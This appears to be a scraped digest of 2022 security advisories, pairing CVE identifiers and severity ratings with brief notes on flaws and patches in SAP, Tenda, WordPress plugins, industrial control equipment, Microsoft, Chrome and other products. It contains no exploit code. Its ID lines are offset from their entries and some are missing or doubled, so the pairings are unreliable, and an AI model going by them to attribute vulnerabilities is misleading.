CVE ID: CVE-2022-37134 (Critical)
A Java deserialization vulnerability has been discovered in the Fishbowl Server of Fishbowl
Inventory that allows remote attackers to execute arbitrary code via a crafted XML payload.
The affected versions are Fishbowl Inventory versions prior to 2022.4.1.
CVE ID: CVE-2022-29805 (Critical)
A read-beyond-bounds vulnerability has been discovered in Apache HTTP Server that can lead
to a crash or disclosure of information. The affected versions are Apache HTTP Server 2.4.53
and earlier.
CVE ID: CVE-2022-28615 (Critical)
It has been discovered that a missing segregation of duty for the SAP Solution Manager
administrator can impact unauthorized execution of commands that lead to sensitive
information disclosure, loss of system integrity and Denial of Service.
CVE ID: CVE-2022-22544 (Critical)
A request smuggling and request concatenation vulnerability has been discovered in SAP
NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP
Content Server 7.53 and SAP Web Dispatcher.
CVE ID: CVE-2022-22536 (Critical)
A vulnerability has been discovered in SAP NetWeaver Application Server Java - versions
KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49 &
7.53, that can trigger improper shared memory buffer handling when a crafted HTTP server
request is submitted.
CVE ID: CVE-2022-22532 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel and
Twisted. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-33655 (High), CVE-2021-33061 (Medium), CVE-2022-24801
Multiple vulnerabilities such as reflected Cross Site Scripting (XSS), and HTTP response
splitting vulnerabilities have been discovered in WorkstationST. The affected versions are
WorkstationST prior to v07.09.15.
CVE ID: CVE-2022-37952 (Low), CVE-2022-37953 (Low)
VMware has released security updates to address a local privilege escalation vulnerability
in VMware Tools. A malicious actor with local non-administrative access to the Guest OS can
escalate privileges to root in the virtual machine.
CVE ID: CVE-2022-31676 (High)
ARC Informatique has released security updates to address a cleartext storage of sensitive
information vulnerability in its equipment- PcVue. Successful exploitation of this
vulnerability can allow access to the OAuth web service database.
CVE ID: CVE-2022-2569 (Medium)
Measuresoft has released a security update to address an out-of-bounds write vulnerability
in its equipment- ScadaPro Server, that can allow arbitrary code execution.
CVE ID: CVE-2022-2892 (High)
Multiple vulnerabilities have been discovered in Measuresoft's Equipment- ScadaPro Server
and Client that can cause arbitrary code execution, privilege escalation, or a Denial of
Service condition.
CVE ID: CVE-2022-2894 (High), CVE-2022-2895 (High), CVE-2022-2896 (High),
CVE-2022-2897 (High), CVE-2022-2898 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-38663 (Medium), CVE-2022-38664 (High), CVE-2022-38665 (Low),
CVE-2021-25738 (High)
Dell has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-26691, CVE-2022-1271, CVE-2022-1586, CVE-2022-31741, CVE-2015-20107,
CVE-2022-2068, CVE-2022-1292, CVE-2022-1664, CVE-2020-17530, CVE-2022-0778, CVE-2022-1292,
CVE-2022-2068
A reflected Cross Site Scripting (XSS) vulnerability has been discovered in the charts tab
selection functionality of WWBN AVideo and dev master commit 3f7c0364 that can lead to
arbitrary JavaScript execution.
CVE ID: CVE-2022-26842 (Critical)
An authentication bypass vulnerability has been discovered in miniOrange OAuth plugin for
WordPress.
CVE ID: CVE-2022-34858 (Critical), CVE-2022-34149 (Critical)
Multiple SQL injection vulnerabilities have been discovered in Bus Pass Management System.
The affected versions are Bus Pass Management System 1.0.
CVE ID: CVE-2022-36198 (Critical)
A stack buffer overflow vulnerability has been discovered in Tenda ac15 firmware. The
affected version is Tenda ac15 firmware V15.03.05.18 httpd server.
CVE ID: CVE-2022-37175 (Critical)
A memory corruption vulnerability has been discovered in jsonxx (Json++). Updates are not
expected; users are advised to find a replacement.
CVE ID: CVE-2022-23459 (Critical)
A SQL injection vulnerability has been discovered in Yimioa via the orderbyGET parameter.
The affected version is Yimioa v6.1.
CVE ID: CVE-2022-36605 (Critical)
A Remote Command Execution (RCE) vulnerability has been discovered in Tenda-AC18. The
affected version is Tenda-AC18 V15.03.05.05.
CVE ID: CVE-2022-35201 (Critical)
It has been discovered that Mealie employs weak password requirements which allows an
adversary to potentially gain unauthorized access to the application via brute-force
attacks. The affected version is Mealie 1.0.0beta3.
CVE ID: CVE-2022-34615 (Critical)
A use of hard-coded cryptographic key vulnerability has been discovered in Delta
Electronics' Equipment- Delta Industrial Automation DIALink that can result in the exposure
of sensitive data.
CVE ID: CVE-2022-2660 (Critical)
A command injection vulnerability has been discovered in mySCADA Technologies' Equipment-
mySCADA myPRO. Successful exploitation can allow an attacker to run commands directly in the
operating system.
CVE ID: CVE-2022-2234 (Critical)
PukiWiki has released a security update to address path traversal, and reflected Cross-site
Scripting (XSS) vulnerabilities in PukiWiki.
CVE ID: CVE-2022-34486 (High), CVE-2022-27637 (Medium)
WordPress has released security updates to address multiple vulnerabilities in the WordPress
Infinite Scroll Ajax Load More plugin for WordPress, and WP-UserOnline plugin for WordPress.
CVE ID: CVE-2022-2943 (Medium), CVE-2022-2945 (Medium), CVE-2022-2433 (High),
CVE-2022-2941 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
F5 has released security updates to address a vulnerability in the 'node' iRules command
which allows an attacker to bypass the access control restrictions for a self IP address,
regardless of the port lockdown settings. Successful exploitation can allow connections to
internal IP addresses/services through an iRule that allows unconstrained manipulation of
the target of the node command.
CVE ID: CVE-2022-33962 (Medium)
Trellix has released security updates to address an improper restriction of XML external
entity reference vulnerability in Data Loss Prevention (DLP) Endpoint for Windows. The
affected versions are Data Loss Prevention Endpoint for Windows prior to 11.6.600 and
11.9.100.
CVE ID: CVE-2022-2330 (Medium)
An XML External Entity Injection (XXE) vulnerability has been discovered in IBM MQ while
processing XML data. A remote attacker can exploit this vulnerability to expose sensitive
information or consume memory resources. The affected versions are IBM MQ 8.0, 9.0 LTS, 9.1
LTS, 9.2 LTS, 9.1 CD, and 9.2 CD.
CVE ID: CVE-2022-22489 (Critical)
It has been discovered that a kiosk breakout (without quit password) in Safe Exam Browser
(Windows) allows an attacker to achieve code execution via the browser's print dialog. The
affected versions are Safe Exam Browser (Windows) prior to 3.4.0.
CVE ID: CVE-2022-36220 (Critical)
A SQL injection vulnerability has been discovered in Library Management System. The affected
version is Library Management System v1.0.
CVE ID: CVE-2022-36729 (Critical), CVE-2022-36728 (Critical), CVE-2022-36727
(Critical)
An authentication bypass vulnerability has been discovered in Open AMT Cloud Toolkit software
for Intel(R). The affected versions are Open AMT Cloud Toolkit software for Intel(R) before
versions 2.0.2 and 2.2.2.
CVE ID: CVE-2022-25899 (Critical)
It has been discovered that the Apache Xalan Java XSLT library is vulnerable to an integer
truncation vulnerability when processing malicious XSLT stylesheets. This vulnerability can
be used to corrupt Java class files generated by the internal XSLTC compiler and execute
arbitrary Java bytecode. No security update will be released by Apache Xalan Java to
address this vulnerability.
CVE ID: CVE-2022-34169 (Critical)
GitLab has released updated versions 15.3.1, 15.2.3, and 15.1.5 for GitLab Community Edition
(CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2884 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Libxslt and Exim.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2019-5815 (High), CVE-2021-30560 (High), CVE-2022-37452
(Critical)
Debian has released security updates to address multiple buffer overflow vulnerabilities in
Kicad package, which can result in the execution of arbitrary code.
CVE ID: CVE-2022-23803 (High), CVE-2022-23804 (High), CVE-2022-23946 (High),
CVE-2022-23947 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that insufficiently protected credentials for Intel(R) AMT and
Intel(R) Standard Manageability can allow information disclosure and escalation of privilege
via network access.
CVE ID: CVE-2022-30601 (Critical)
A remote command injection vulnerability has been discovered in FLIR AX8 thermal sensor
cameras that can allow an attacker to execute arbitrary commands on the underlying operating
system with root privileges. The affected versions are all FLIR AX8 thermal sensor cameras
version up to and including 1.46.16.
CVE ID: CVE-2022-37061 (Critical)
Huawei has released a security update to address a permission bypass vulnerability in Huawei
cross device task management. Successful exploitation can allow an attacker to access
certain resources on the attacked devices.
CVE ID: CVE-2021-46834 (Medium)
Schneider Electric has released security updates to resolve multiple vulnerabilities in the
BMENUA0100 - OPC UA module and the BMENOR2200H X80 Advanced RTU communication module for
M580.
CVE ID: CVE-2022-34759 (High), CVE-2022-34760 (High), CVE-2022-34761 (High),
CVE-2022-34762 (Medium), CVE-2022-34763 (Medium), CVE-2022-34764 (Medium), CVE-2022-34765
(Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-23055 (Medium), CVE-2022-29582 (High), CVE-2022-32981 (High),
CVE-2022-2274 (High), CVE-2022-22576 (Medium), CVE-2022-27774 (High), CVE-2022-27775 (High),
CVE-2022-27776 (High)
Microsoft has released Microsoft Edge Stable Channel (Version 104.0.1293.63). This update
contains a fix for CVE-2022-2856, which has an exploit in the wild.
A stack buffer overflow vulnerability has been discovered due to unsafe parsing of a PNG
tRNS chunk in FastStone Image Viewer. The affected versions are FastStone Image Viewer
through 7.5.
CVE ID: CVE-2022-36947 (Critical)
It has been discovered that a hardcoded JWT secret in AgileConfig Server allows remote
attackers to use the generated JWT token to gain administrator access. The affected versions
are AgileConfig Server prior to 1.6.8.
CVE ID: CVE-2022-35540 (Critical)
A SQL injection vulnerability has been discovered in Library Management System. The affected
version is Library Management System v1.0.
CVE ID: CVE-2022-36725 (Critical), CVE-2022-36722 (Critical)
Apple has released a security update to address an out-of-bounds write vulnerability in
Safari for macOS Big Sur and macOS Catalina.
CVE ID: CVE-2022-32893
Siemens has released security updates to address OpenSSL Infinite Loop vulnerability in
multiple industrial products. Successful exploitation of this vulnerability can create a
denial-of-service condition in the affected products.
CVE ID: CVE-2022-0778 (High)
Dell has released security updates to address multiple vulnerabilities in Dell EMC PowerFlex
Rack that can be exploited by malicious users to compromise the affected system.
A SQL injection vulnerability has been discovered in Barangay Management System. The
affected version is Barangay Management System v1.0.
CVE ID: CVE-2022-35175 (Critical)
It has been discovered that the IBM Security Verify Governance Identity Manager virtual
appliance component performs an operation at a privilege level that is higher than the
minimum level required, which creates new weaknesses or amplifies the consequences of other
weaknesses. The affected version is IBM Security Verify Governance Identity Manager 10.0.
CVE ID: CVE-2022-22455 (Critical)
It has been discovered that Zoom On-Premise Meeting Connector Zone Controller (ZC) fails to
properly parse STUN error codes, which can result in memory corruption and can allow a
malicious actor to crash the application. The affected versions are Zoom On-Premise Meeting
Connector Zone Controller (ZC) versions prior to 4.8.20220419.112.
CVE ID: CVE-2022-28750 (Critical)
A buffer overflow vulnerability has been discovered in D-Link Go-RT-AC750
GORTAC750_revA_v101b03 & GO-RT-AC750_revB_FWv200b02 via authenticationcgi_main.
CVE ID: CVE-2022-36525 (Critical)
A command injection vulnerability has been discovered in D-Link Go-RT-AC750
GORTAC750_revA_v101b03 & GO-RT-AC750_revB_FWv200b02 via /htdocs/upnpinc/gena.php.
CVE ID: CVE-2022-36523 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-2625 (High), CVE-2022-33741 (High), CVE-2022-26365 (High),
CVE-2022-33740 (High), CVE-2022-37434 (Critical)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-32792, CVE-2022-32816, CVE-2022-24805, CVE-2022-24806, CVE-2022-24807,
CVE-2022-24808, CVE-2022-24809, CVE-2022-24810, CVE-2022-29536, CVE-2022-2852,
CVE-2022-2853, CVE-2022-2854, CVE-2022-2855, CVE-2022-2856, CVE-2022-2857, CVE-2022-2858,
CVE-2022-2859, CVE-2022-2860, CVE-2022-2861
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20871 (High), CVE-2022-20829 (Medium)
WordPress has released security updates to address vulnerabilities in the Migration, Backup,
Staging – WPvivid plugin for WordPress, Download Manager plugin for WordPress, and All-in-One
Video Gallery plugin for WordPress.
CVE ID: CVE-2022-2442 (High), CVE-2022-2436 (High), CVE-2022-2633 (High)
Apple has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-32894, CVE-2022-32893
Google has released Chrome Beta 105 (105.0.5195.37) for iOS, Chrome 104 (104.0.5112.97) for
Android, Chrome Beta 105 (105.0.5195.35) for Android, and Beta channel 105.0.5195.37 for
Windows, Mac and Linux.
Zoom has released security updates to address a privilege escalation vulnerability in Auto
Updater for Zoom Client for Meetings for macOS. The affected products are Zoom Client for
Meetings for macOS (Standard and for IT Admin) starting version 5.7.3 and before version
5.11.6.
CVE ID: CVE-2022-28757 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Microsoft has released Microsoft Edge Mobile Stable Channel (Version 104.0.1293.60). This
update contains a fix for CVE-2022-2856, which has an exploit in the wild.
A SQL injection vulnerability has been discovered in Clinic's Patient Management System. The
affected version is Clinic's Patient Management System v1.0.
CVE ID: CVE-2022-36242 (Critical)
A code injection vulnerability has been discovered in Esri Portal for ArcGIS which can
potentially cause arbitrary code execution in a victim's browser. The affected versions are
Esri Portal for ArcGIS versions 10.8.1 and below.
CVE ID: CVE-2022-38193 (Critical)
A SQL injection vulnerability has been discovered in Mingsoft MCMS. The affected version is
Mingsoft MCMS 5.2.8.
CVE ID: CVE-2022-36599 (Critical), CVE-2022-36272 (Critical)
A buffer overflow vulnerability has been discovered in the FTcpListener thread of The Isle
Evrima (the dedicated server on Windows and Linux), which allows a remote attacker to crash
any server with an accessible RCON port, or possibly execute arbitrary code. The affected
versions are The Isle Evrima 0.9.88.07 before 2022-08-12.
CVE ID: CVE-2022-38221 (Critical)
It has been discovered that totd uses a fixed UDP source port in upstream queries sent to
DNS resolvers. This allows DNS cache poisoning because there is not enough entropy to
prevent traffic injection attacks. The affected version is totd 1.5.3.
CVE ID: CVE-2022-34294 (Critical)
It has been discovered that the Airspan AirVelocity 1500 web management UI displays SNMP
credentials in plaintext and stores SNMPv3 credentials unhashed on the filesystem, enabling
anyone with web access to use these credentials to manipulate the eNodeB over SNMP. The
affected versions are Airspan AirVelocity 1500 web management UI older than 15.18.00.2511.
CVE ID: CVE-2022-36308 (Critical)
It has been discovered that multiple CODESYS vulnerabilities affect several WAGO products.
The mitigations are available.
CVE ID: CVE-2019-9013 (High), CVE-2019-9011, CVE-2020-12067, CVE-2020-12069, CVE-2021-33485
(Critical), CVE-2020-6081 (High), CVE-2021-36763 (High), CVE-2021-36765 (High),
CVE-2021-29241 (High), CVE-2021-29242 (High)
An authorization bypass vulnerability through User-Controlled Key has been discovered in the
GitHub repository emicklei/go-restful. The affected versions are GitHub repository
emicklei/go-restful prior to v3.8.0.
CVE ID: CVE-2022-1996 (Critical)
Multiple vulnerabilities such as out-of-bounds write, and heap-based buffer overflow have
been discovered in the HDF5 file format, which allows an attacker to execute remote code on
a targeted device.
CVE ID: CVE-2022-25972, CVE-2022-25942, CVE-2022-26061
Multiple vulnerabilities have been discovered in WWBN AVideo Web App, which can lead to
command injection or authentication bypass.
CVE ID: CVE-2022-32777, CVE-2022-32778, CVE-2022-32761, CVE-2022-28710, CVE-2022-30534,
CVE-2022-33147, CVE-2022-33148, CVE-2022-33149, CVE-2022-32572, CVE-2022-26842,
CVE-2022-32770, CVE-2022-32771, CVE-2022-32772, CVE-2022-30690, CVE-2022-28712,
CVE-2022-29468, CVE-2022-30605, CVE-2022-32282
WordPress has released a security update to address a vulnerability due to deserialization
of untrusted input via the $log_file value in Broken Link Checker plugin for WordPress. The
affected versions are Broken Link Checker versions up to, and including 1.11.16.
CVE ID: CVE-2022-2438 (High)
It has been discovered that cyber threat actors have been targeting unpatched Zimbra
Collaboration Suite (ZCS) instances in both government and private sector networks.
Organizations that detect potential compromises should apply the mitigations.
CVE ID: CVE-2022-27924 (High), CVE-2022-27925 (High), CVE-2022-37042 (High),
CVE-2022-30333 (High), CVE-2022-24682 (Medium)
An inadequate encryption strength vulnerability has been discovered in LS Electric's
Equipment- LS ELEC PLC and XG5000. Successful exploitation of this vulnerability can allow
an attacker to decrypt credentials and gain full access to the affected Programmable Logic
Controller (PLC).
CVE ID: CVE-2022-2758 (Medium)
Delta Electronics has released security updates to address an improper restriction of XML
external entity reference vulnerability in its Equipment- Delta Robot Automation Studio
(DRAS) that can allow an attacker to read and exfiltrate sensitive information from the
affected host machine.
CVE ID: CVE-2022-2759 (Medium)
An unrestricted upload of a file with a dangerous type vulnerability has been discovered in
B&R Industrial Automation's Equipment- Automation Studio 4, which can cause a threat to the
integrity and confidentiality of data or cause a Denial of Service condition. The
mitigations are available.
CVE ID: CVE-2021-22289 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A vulnerability has been discovered in the taocms website settings that allows arbitrary PHP
code to be injected by modifying config.php. The affected version is taocms 3.0.2.
CVE ID: CVE-2022-36262 (Critical)
A vulnerability in the VR Calendar WordPress plugin allows any user to execute arbitrary PHP
functions on the site. The affected versions are VR Calendar WordPress plugin through 2.2.2.
CVE ID: CVE-2022-2314 (Critical)
An authentication bypass vulnerability has been discovered in YugabyteDB 2.6.1 when using
LDAP-based authentication in YCQL with Microsoft's Active Directory.
CVE ID: CVE-2022-37397 (Critical)
A stack overflow vulnerability has been discovered in /goform/setAutoPing of Tenda W6. An
attacker can use this vulnerability to achieve arbitrary code execution. The affected
version is Tenda W6 V1.0.0.9(4122).
CVE ID: CVE-2022-35559 (Critical)
A vulnerability has been discovered in Red Hat Process Automation Manager that allows an
adversary to conduct a brute force attack against the Administration Console, as the
application does not limit the number of unsuccessful login attempts.
CVE ID: CVE-2022-2457 (Critical)
Softing has released security updates to address multiple vulnerabilities in its Equipment-
Secure Integration server that can cause a Denial of Service (DoS) condition.
CVE ID: CVE-2022-1069 (High), CVE-2022-2334 (High), CVE-2022-2336 (Critical),
CVE-2022-1373 (High), CVE-2022-2338 (Medium), CVE-2022-1748 (High), CVE-2022-2337 (High),
CVE-2022-2547 (High), CVE-2022-2335 (High)
Multiple vulnerabilities have been discovered in Emerson's Equipment- Proficy Machine
Edition. Successful exploitation of these vulnerabilities can allow execution of remote
hidden code on the connected Programmable Logic Controller (PLC) and malicious files to be
uploaded from the PLC to connected workstations. The mitigations are available.
CVE ID: CVE-2022-2793 (Medium), CVE-2022-2792 (Medium), CVE-2022-2791 (Medium),
CVE-2022-2790 (Medium), CVE-2022-2789 (Medium), CVE-2022-2788 (Critical)
Multiple vulnerabilities have been discovered in Sequi's Equipment- Sequi PortBloque S,
which can result in unauthorized changes to device configuration, to include adding new
users or changing existing passwords for persistent access to the device.
CVE ID: CVE-2022-2662 (Critical), CVE-2022-2661 (Critical)
Google has released Dev channel 106.0.5239.0 (Platform version: 15047.0.0/15048.0.0) for
most ChromeOS devices, Chrome Stable 104 (104.0.5112.99) for iOS and Stable channel
104.0.5112.101 for Mac & Linux & 104.0.5112.102/101 for Windows to resolve multiple
vulnerabilities. An exploit for the insufficient validation of untrusted input in Intents
vulnerability (CVE-2022-2856) exists in the wild.
CVE ID: CVE-2022-2852 (Critical), CVE-2022-2854 (High), CVE-2022-2855 (High),
CVE-2022-2857 (High), CVE-2022-2858 (High), CVE-2022-2853 (High), CVE-2022-2856 (High),
CVE-2022-2859 (Medium), CVE-2022-2860 (Medium), CVE-2022-2861 (Medium)
Red Hat has released security updates to address multiple vulnerabilities in Red Hat
OpenShift sandboxed containers. The affected product is Red Hat OpenShift Container Platform
4.11 for RHEL 8 x86_64.
CVE ID: CVE-2021-40528 (Medium), CVE-2022-1621 (High), CVE-2022-1629 (High),
CVE-2022-22576 (High), CVE-2022-25313 (Medium), CVE-2022-25314 (High), CVE-2022-27774
(Medium), CVE-2022-27776 (Medium), CVE-2022-27782 (High), CVE-2022-29824 (Medium)
Microsoft has released security updates to address an elevation of privilege vulnerability
in Windows Defender Credential Guard affecting multiple products. Successful exploitation of
this vulnerability can allow an attacker to gain SYSTEM privileges.
CVE ID: CVE-2022-34711 (High)
Microsoft has released security updates to address a security feature bypass vulnerability
in Windows Defender Credential Guard affecting multiple products. Successful exploitation of
this vulnerability can allow an attacker to bypass Kerberos protection used by Defender
Credential Guard.
CVE ID: CVE-2022-35822 (High)
Ubuntu has released security updates to resolve multiple vulnerabilities in the WebKitGTK
Web and JavaScript engines that can cause Cross Site Scripting (XSS) attacks, Denial of
Service (DoS) attacks, and arbitrary code execution. The affected products are Ubuntu 22.04
LTS & Ubuntu 20.04 LTS.
CVE ID: CVE-2022-2294 (High), CVE-2022-32792, CVE-2022-32816
An out-of-bounds write vulnerability has been discovered in the Chrome OS Audio Server in
Google Chrome for Chrome OS. This vulnerability allows a remote attacker to potentially
exploit heap corruption via crafted audio metadata. The affected versions are Google Chrome
for Chrome OS prior to 102.0.5005.125.
CVE ID: CVE-2022-2587 (Critical)
It has been discovered that, due to insecure session management, SAP Enable Now allows an
unauthenticated attacker to gain access to a user's account. On successful exploitation, an
attacker can view or modify user data, causing limited impact on the confidentiality and
integrity of the application.
CVE ID: CVE-2022-35293 (Critical)
An authentication-bypass vulnerability has been discovered in MSNSwitch MNT.2408 of Mega
System Technologies Inc. This vulnerability allows unauthenticated attackers to arbitrarily
configure settings within the application, leading to remote code execution.
CVE ID: CVE-2022-32429 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
TRUMPF has released security updates to address multiple vulnerabilities in the OPC UA SDK
that affect several TRUMPF products.
CVE ID: CVE-2022-29864 (High), CVE-2022-29862 (High)
A privilege escalation vulnerability has been discovered in the Auto Updater for Zoom Client
for Meetings for macOS. The affected products are Zoom Client for Meetings for macOS
(Standard and for IT Admin) starting with version 5.7.3 and before 5.11.5.
CVE ID: CVE-2022-28756 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-35912 (Critical), CVE-2022-33879 (Low), CVE-2022-32532 (Critical),
CVE-2022-29582 (High), CVE-2022-26477 (High), CVE-2021-23055 (Medium)
It has been discovered that IBM Robotic Process Automation does not require users to have
strong passwords by default, which makes it easier for attackers to compromise user accounts.
The affected versions are IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2.
CVE ID: CVE-2022-35280 (Critical)
It has been discovered that the ts-deepmerge package is vulnerable to prototype pollution
due to missing sanitization in the merge function. The affected versions are ts-deepmerge
package before 2.0.2.
CVE ID: CVE-2022-25907 (Critical)
An insufficient verification of data authenticity (OT:ICEFALL) vulnerability has been
discovered in Emerson's Equipment- ROC800, ROC800L and DL8000 that can cause file
manipulation.
CVE ID: CVE-2022-30264 (Medium)
Multiple vulnerabilities have been discovered in Baxter's Equipment- Sigma Spectrum Infusion
Pumps that can result in access to sensitive data, alteration of system configuration, and
impact on system availability.
CVE ID: CVE-2020-12039 (Medium), CVE-2020-12040 (High), CVE-2020-12045 (High),
CVE-2020-12041 (High), CVE-2020-12047 (High), CVE-2020-12043 (High)
Zeppelin ransomware, a derivative of the Delphi-based Vega malware family that functions as
Ransomware as a Service (RaaS), is targeting critical infrastructure organisations.
Adversaries gain initial access to victim networks via RDP exploitation, exploitation of
SonicWall firewall vulnerabilities and phishing campaigns.
A security feature bypass vulnerability has been discovered in signed third party UEFI
bootloaders that allows bypass of the UEFI Secure Boot feature. An attacker who successfully
exploits this vulnerability can bypass the UEFI Secure Boot feature and execute unsigned
code during the boot process.
CVE ID: CVE-2022-34301, CVE-2022-34302, CVE-2022-34303
A memory corruption vulnerability has been discovered in the httpd unescape functionality of
DD-WRT Revision 32270 - Revision 48599.
CVE ID: CVE-2022-27631 (Critical)
A memory corruption vulnerability has been discovered in the httpd unescape functionality of
Asuswrt and Asuswrt-Merlin. A specially-crafted HTTP request can lead to memory corruption.
The affected versions are Asuswrt prior to 3.0.0.4.386_48706 and Asuswrt-Merlin New Gen
prior to 386.7.
CVE ID: CVE-2022-26376 (Critical)
A heap-based buffer over-read or buffer overflow vulnerability has been discovered in zlib
through 1.2.12.
CVE ID: CVE-2022-37434 (Critical)
A PAN-OS URL filtering policy misconfiguration could allow a network-based attacker to
conduct reflected and amplified TCP denial-of-service (RDoS) attacks.
CVE ID: CVE-2022-0028 (High)
SonicWall has released security updates to address multiple Linux Kernel vulnerabilities
that affect SonicWall SMA1000 Platform. The affected products are SonicWall SMA1000
12.4.2-02044 and earlier versions.
CVE ID: CVE-2021-33909 (High), CVE-2022-0847 (High)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20715 (High), CVE-2022-20866 (High), CVE-2022-20713 (Medium),
CVE-2022-20829 (Medium), CVE-2021-1585 (Medium)
Dell has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
A cross-site scripting vulnerability has been discovered in jQuery UI Checkboxradio, a
third-party library used by Drupal. jQuery UI has released a security update to address this
vulnerability.
CVE ID: CVE-2022-31160
Google has released Chrome Beta 105 (105.0.5195.28) for iOS, LTS channel 96.0.4664.218
(Platform Version: 14268.99.0) for most ChromeOS devices, LTC- 102.0.5005.170 (Platform
Version: 14695.115.0) for most ChromeOS devices, Beta channel 105.0.5195.28 for Windows, Mac
and Linux, and Chrome Beta 105 (105.0.5195.26) for Android.
CVE ID: CVE-2022-2477 (High), CVE-2022-2481 (High), CVE-2022-2480 (High),
CVE-2022-2479 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A SQL injection vulnerability has been discovered in SourceCodester Interview Management
System. The affected version is 1.0.
CVE ID: CVE-2022-2679 (Critical)
It has been discovered that Renato employs weak password complexity requirements that allow
attackers to crack user passwords via brute-force attacks. The affected version is Renato
v0.17.0.
CVE ID: CVE-2022-35143 (Critical)
It has been discovered that Totolink A3600R_Firmware V4.1.2cu.5182_B20201102 contains a
hard-coded password for root in /etc/shadow.sample.
CVE ID: CVE-2022-34993 (Critical)
It has been discovered that Crow has a heap-based buffer overflow vulnerability via the
function qs_parse in query_string.h. Successful exploitation of this vulnerability can allow
attackers to remotely execute arbitrary code in the context of the vulnerable service.
CVE ID: CVE-2022-34970 (Critical)
It has been discovered that Nextcloud Mail has a vulnerability that can lead to Server-Side
Request Forgery (SSRF). The updates are available.
CVE ID: CVE-2022-31132 (Critical)
An authentication bypass vulnerability has been discovered in the GitHub repository
bookwyrm-social/bookwyrm. Versions prior to 0.4.5 are affected.
CVE ID: CVE-2022-2651 (Critical)
It has been discovered that the GVRET Stable Release contains a buffer overflow vulnerability
via the handleConfigCmd function in SerialConsole.cpp.
CVE ID: CVE-2022-35161 (Critical)
A heap-based buffer overflow vulnerability has been discovered in sqbaselib.cpp in SQUIRREL
due to the lack of a certain sq_reservestack call.
CVE ID: CVE-2022-30292 (Critical)
A vulnerability has been discovered in Vinchin Backup and Recovery. The server uses a
hard-coded password for the administrator user. Successful exploitation can allow an
attacker to bypass authentication on the system.
CVE ID: CVE-2022-35866 (Critical)
Microsoft has released security updates to address a remote code execution vulnerability in
Microsoft Windows Support Diagnostic Tool (MSDT).
CVE ID: CVE-2022-34713 (High)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Network File System.
CVE ID: CVE-2022-34715 (Critical)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Point-to-Point Protocol (PPP). An unauthenticated attacker can send
a specially crafted connection request to a RAS server, which can lead to remote code
execution on the RAS server machine.
CVE ID: CVE-2022-30133 (Critical)
Ubuntu has released security updates to resolve a vulnerability in libcdio, which can
result in a heap buffer overflow or in a NULL pointer dereference. If a user or automated
system were tricked into opening a specially crafted file, an attacker can use this
vulnerability to cause a Denial of Service. The affected products are Ubuntu 16.04 ESM, and
Ubuntu 14.04 ESM.
CVE ID: CVE-2017-18198 (High), CVE-2017-18199 (Medium)
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
AUMA Riester has released security updates for SIMA2 Master Station, which contains an
outdated version of ntpd, a reference implementation of the Network Time Protocol (NTP), that
is affected by several vulnerabilities.
CVE ID: CVE-2015-7853 (Critical), CVE-2015-7705 (Critical), CVE-2018-12327 (Critical),
CVE-2015-7871 (Critical), CVE-2018-7183 (Critical)
Debian has released a security update to resolve multiple vulnerabilities in the GStreamer
plugins that demux Matroska and AVI files, which can result in Denial of Service or the
execution of arbitrary code.
CVE ID: CVE-2022-1920, CVE-2022-1921, CVE-2022-1922, CVE-2022-1923, CVE-2022-1924,
CVE-2022-1925, CVE-2022-2122
Ubuntu has released security updates to resolve multiple vulnerabilities in the Linux
kernel. The affected products are Ubuntu 16.04 ESM, and Ubuntu 14.04 ESM.
CVE ID: CVE-2022-2588 (Medium), CVE-2022-2586 (Medium)
Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An
attacker can exploit these vulnerabilities to take control of an affected system.
VMware has released security updates to address multiple vulnerabilities in vRealize
